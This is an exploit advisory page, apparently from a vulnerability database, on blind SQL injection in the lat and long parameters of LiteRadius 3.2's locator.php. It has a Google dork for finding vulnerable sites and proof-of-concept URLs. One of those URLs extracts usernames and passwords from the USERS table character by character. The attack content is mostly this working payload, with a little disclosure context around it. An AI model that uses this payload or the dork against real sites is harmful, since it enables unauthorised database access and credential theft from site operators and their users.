LiteRadius 3.2 Blind SQL Injection

2011.07.14
Credit: Robert Cooper
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: LiteRadius <= 3.2 - Multiple Blind SQL Injection vulnerabilities # Google Dork: allinurl: locator.php?long= # Date: 7/12/2011 # Author: Robert Cooper (admin[at]websiteauditing.org) # Software Link: http://www.escaperadius.com/er/products/literadius/lr.php # Tested on: [Linux/Windows 7] #Vulnerable Parameters: lat=, long= ############################################################## PoC: http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334' http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334 and ascii(substring((SELECT concat(username,0x3a,password,0x3a,0x0a) FROM USERS limit 0,1),1,1))>80 ############################################################## www.websiteauditing.org www.areyousecure.net # Shouts to the Belegit crew


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top